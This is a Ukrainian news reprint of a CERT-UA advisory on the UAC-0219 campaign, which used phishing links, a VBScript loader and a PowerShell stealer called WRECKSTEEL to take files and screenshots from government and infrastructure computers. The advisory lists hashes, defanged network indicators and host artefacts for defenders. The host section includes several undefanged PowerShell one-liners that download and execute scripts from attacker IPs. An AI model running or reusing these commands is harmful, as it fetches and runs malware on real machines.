• Посилання скопійовано

Увага! Нові кібератаки на об’єкти критичної інфраструктури та держустанови

У Держспецзв’язку повідомили про нові кібератаки на об’єкти критичної інфраструктури та держустанови. Для реалізації зловмисного задуму здійснюється розповсюдження електронних листів з посиланнями на публічні файлові сервіси DropMeFiles, Google Drive

Увага! Нові кібератаки на об’єкти критичної інфраструктури та держустанови

Загальна інформація

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA вживаються системні заходи щодо накопичення та проведення аналізу даних про кіберінциденти з метою надання актуальної інформації про кіберзагрози.

Так, протягом березня 2025 року зафіксовано щонайменше три кібератаки стосовно органів державного управління та об'єктів критичної інфраструктури України, що мали на меті збір та викрадення інформації з комп'ютерів із застосуванням відповідних програмних засобів.

Для реалізації зловмисного задуму з використанням скомпрометованих облікових записів здійснюється розповсюдження електронних листів з посиланнями на публічні файлові сервіси DropMeFiles, Google Drive тощо (деколи посилання містяться у PDF-вкладеннях), відвідування яких призведе до завантаження та запуску VBScript-лоадеру (зазвичай має розширення ".js"). Призначенням останнього є завантаження та запуск PowerShell-скрипта, який забезпечує пошук та вивантаження за допомогою cURL файлів відповідно до списку розширень ("*.doc", "*.txt", "*.docx", "*.xls", "*.xlsx", "*.pdf", "*.rtf", "*.odt", "*.csv", "*.ods", "*.ppt", "*.pptx", "*.png", "*.jpg", "*.jpeg"), а також знімків екрана комп'ютера.

Детальне дослідження кіберзагрози дозволило зробити висновок про те, що описана активність здійснюється щонайменше з осені 2024 року. При цьому протягом 2024 року під час здійснення кібератак використовувалися EXE файли, створені за допомогою NSIS-інсталятора, що містили документ-приманку (PDF, JPG), VBScript-стілер, а також програму-графічний редактор "IrfanView", що використовувалася для виготовлення скріншотів (слід зауважити, що з 2025 року функціонал виготовлення знімків екрана реалізовано за допомогою PowerShell).

Основний програмний засіб, версії якого відомі на мовах програмування VBScript та PowerShell та який призначений для викрадення файлів, класифіковано як WRECKSTEEL.

Активність відстежується за ідентифікатором UAC-0219.

Беручи до уваги нерезидентність стілерів як таких, у разі виявлення ознак здійснення кібератак просимо невідкладно інформувати CERT-UA з метою вжиття оперативних заходів кіберзахисту.

 

Індикатори кіберзагроз

Файли:    
(15.09.2024)    
e3eb9783b7140076a8c3f36a1679f4dc 6089e28a711e519890b05283de1e4abb7b63aa4d09e7ab90a92f65585779fa4b photo_15.09.24_JPG.js
79ea606b9aa085a7546182647b9677bf c02e57c49d940a279852109a06c19a78052dd51300975037413133c1a79e97ac seeddoc.exe
4cab7ec6a408477bc25a5d9f5fb30263 444ce0318560454c4366cf4c112ab9912adba124bb8c29697ac3d344befcb7e6 lumina.exe
897966ae3a4cbd3b63e3a0eba41158a8 a3d91c4c039e50718d930cd5251e382f0f3997ec63e872539644b8c735bd4961 photo_15.09.24_JPG.jpg
687ec4159b78f825fe10443989070516 3c6c0ed1ff12b5489a6838b7a9d4ab84bb8e2b5f0b46fb093b39b0f030b5ef16 AppFinalDesktop.vbs
(07.10.2024)    
93d0d1f7ed2c46644fb129210b4c1ccc d26aa72fd238c0408fd365b96d8aa9662be3d4c9d479309bef428e34831aaf42 visa_letter.exe
4cab7ec6a408477bc25a5d9f5fb30263 444ce0318560454c4366cf4c112ab9912adba124bb8c29697ac3d344befcb7e6 lumina.exe
f236c95a1ecef37823b6ea763d4a3c54 3f2287caa07c1238e2e61e47f5cc3f91ad739636a84fbbd86d03c2d16daf36cb Ahmad_Aldhefairi_Visa_Appeal_Letter_PDF.pdf
aef0ff60a06aee4ec0a883acf32cccd6 2e38f3413f88b38ac5f958de12e6fec37dd53de3f8fb1644172e112346e5ede2 AppFinalDesktop.vbs
(15.02.2025)    
aaef9799a198169f8b88198cfb8c50ba 4bdaa2e9bc6c6986981d039b29085683ed36b5c2549466101a81ad660281465c script.ps1
9ef17ebb9e719145c07581179965538d f2ee357c18fb1a3d229a365023456b4ce561db62e761e427fef638ec0f371ede f2ee357c18fb1a3d229a365023456b4ce561db62e761e427fef638ec0f371ede
deaf2612c54c667481fc74ecc484495d 24885b72dc3ce5cc1530fd003bcbfb108d311de1a4ce828cb7cdc2411e705337 24885b72dc3ce5cc1530fd003bcbfb108d311de1a4ce828cb7cdc2411e705337
(10.03.2025)    
92deaf866f3f75970690704420b9dac9 1235bf9c1b0d2a54e451b512ad34a81774d637ae58436416388fb3b7f901ad6e Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_10.03_PDF.js
61f68e5d2c0e7175250cbd11713ff807 cae156d492a4aa07e3d3e4b15f843308c09df7f2c8bf44d9e7093b4393e01fe1 scripttest2.ps1
54525fa50265ca8a0acb25e9aed76a37 e7fdee4fab59f8c4351e3c9e0a478803df9c7ac5f9163d13f476d9bb4abce5ee Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_10.03_PDF.pdf
(18.03.2025)    
f79588fb4847b7c398be8457edece3e2 8acb7292c2b1163746296941977d191ef8d5fcf8bd646e4f5c4ab8718fe7b866 Зміни в графіку роботи співробітників 14.04.2025.pdf
4d1de234e39d796efe5319a4903001ff 92f961d3cb29eda1214c24c0f882f49fb9e43885f696ebec2891380e6e4ec400 Список документів та звернення.zip
30b6e997a451bbf19384612a848c5536 84b438fac113615c2e81f440de2cafa4e2ccd74adc4867d73df30bb9d01dcdb6 Скан документів та додатки.js
51225b5faf771938f55489f2bb128da6 c386bce3de6854bd1424467242f9cf95271de39890b5a2fb3e884e509b1b03c6 scratest.ps1
62bef3a44fd6eb0da37ffb4121c6f354 566609e0e042b611c9d929cb94be4b5a17e7dbb884b4ebd2e0d68adc9fa6bf73 566609e0e042b611c9d929cb94be4b5a17e7dbb884b4ebd2e0d68adc9fa6bf73
65d5901b51f08d98a4156357ea0d4164 9a921a344913d442430a31a3dc1d01aff2b416ca601fed68633021ffefc92fab Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf
7d39f9cd4ba706e7ffcd0c8b52d1eb4c ee8d452a1cc9bcd7e0f002a901a4ce63ddf98c0e13cba415f7325cd9cdccf0b8 scripttest.ps1
(20.03.2025)    
8a633de89ddca99ca8dd38ad43cf764a 89534f86ab5daaf55ce818872960eaa4eb64f4cc19118feea690638bf1156528 Список співробітників на зменшення заробітньої плати 20.03.pdf
aefdd4d762a9657db41c23f9c4de424a 1dc1d8ccb2ca280ef9083c334432909d2a9f86eca225252a3e9a4708adc98931 Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_20.03_PDF.js
e46f1fa50b0b632477c22f15d00fabf2 d28c67736169af47753b5d92d82e239dc4e2b9ff03a633e5d32c8c3287e7b293 Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_platy_20.03_PDF.pdf

Мережеві:

(15.09.2024)

hXXp://172[.]86.114.149/seeddoc.exe

hXXp://172[.]86.114.149:80/upload

172.86.114.149

(07.10.2024)

hXXp://167[.]88.167.254:80/upload

hXXp://45[.]61.159.252/visa_letter[.]exe

hXXps://drobbox[.]cloud/

hXXps://mfashara[.]com/

167[.]88.167.254

172[.]86.116.135

172[.]86.65.194

185[.]212.44.87

45[.]61.159.252

drobbox[.]cloud

mfashara[.]com

(15.02.2025)

hXXp://45[.]61.157.179/script.ps1

hXXp://45[.]61.157.179/upload

45[.]61.157.179

eschool-ua[.]online

www.eschool-ua[.]online

(10.03.2025)

hXXp://172[.]86.88.186/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_10.03_PDF.pdf

hXXp://172[.]86.88.186/scripttest2.ps1

hXXp://172[.]86.88.186/upload

hXXps://dropmefiles[.]cc/ua/d/5l8x3hv/c2e4a009b0acaea484f4384134824c69/58ffd536202b020abd5b1ea453297b2a

hXXps://dropmefiles[.]cc/ua/d/pweym/db923cfd3b8b67f23a1b6dee06f1f66c/62bef3a44fd6eb0da37ffb4121c6f354

hXXps://dropmefiles[.]cc/ua/d/q5cy/17063277217449d39e2328a007ffb4fa/92deaf866f3f75970690704420b9dac9

hXXps://iocreestr[.]tech/zakon_rada/cabinet_ministriv_postanova_1559_2024/read/

172[.]86.72.194

172[.]86.84.84

172[.]86.88.186

45[.]61.141.215

91[.]203.63.10

iocreestr[.]tech

rrrt[.]website

(18.03.2025)

hXXp://172[.]86.104.17/Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf

hXXp://172[.]86.104.17/scratest.ps1

hXXp://172[.]86.104.17/upload

hXXp://172[.]86.88.15/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_06.03_PDF.pdf

hXXp://172[.]86.88.15/scripttest.ps1

hXXp://172[.]86.88.15/upload

hXXps://api.ipify[.]org

hXXps://drive.google[.]com/file/d/1bsf3i4f0jsb8bpdsxeedaejpenzo0nwt/view?usp=sharing

hXXps://dropmefiles[.]cc/ua/d/zfkwbuvs/326a8605975106f1672c912bd16b4e7b/30b6e997a451bbf19384612a848c5536

143[.]244.46.116

172[.]86.104.17

172[.]86.88.15

91[.]203.63.10

workai[.]work

(20.03.2025)

hXXp://144[.]172.98.178/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_platy_20.03_PDF.pdf

hXXp://144[.]172.98.178/scretest.ps1

hXXp://144[.]172.98.178/upload

hXXps://dropmefiles[.]top/ua/d/ebc5ka/d996e31032e7c288d7e20e7b82221c20/aefdd4d762a9657db41c23f9c4de424a

144[.]172.98.178

91[.]203.63.75

Хостові:

%TEMP%\Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_27.03_PDF.pdf

powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://107.189.20.74/screvan.ps1' | iex"

%TEMP%\Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_31.03_PDF.pdf

powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://172.86.122.94/scrxxx.ps1' | iex"

%TEMP%\Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf

powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://172.86.104.17/scratest.ps1' | iex"

%PROGRAMFILES%\IrfanView\i_view64.exe

%TEMP%\Ahmad_Aldhefairi_Visa_Appeal_Letter_PDF.pdf

%TEMP%\AppFinalDesktop.vbs

%TEMP%\lumina.exe

powershell -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://144.172.98.178/scretest.ps1' | iex"

powershell -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://172.86.88.15/scripttest.ps1' | iex

powershell -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('http://45.61.157.179/script.ps1')"

wscript.exe "%TEMP%\AppFinalDesktop.vbs"

 

Графічні зображення

Рис. 1. Приклад ланцюга ураження

Джерело: CERT-UA

Рубрика: Суспільство і життя/Суспільство, події

Зверніть увагу: новинна стрічка «Дебету-Кредиту» містить не тільки редакційні матеріали, але також статті сторонніх авторів, роз'яснення співробітників фіскальної служби тощо.

Дані матеріали, а також коментарі до них, відображають виключно точку зору їх авторів і можуть не співпадати з точкою зору редакції. Редакція не ідентифікує особи коментаторів, не модерує тексти коментарів та не несе відповідальності за їх зміст.

30 днiв передплати безкоштовно!Оберiть свiй пакет вiд «Дебету-Кредиту»
на мiсяць безкоштовно!
Спробувати

Усі новини рубрики «Суспільство, події»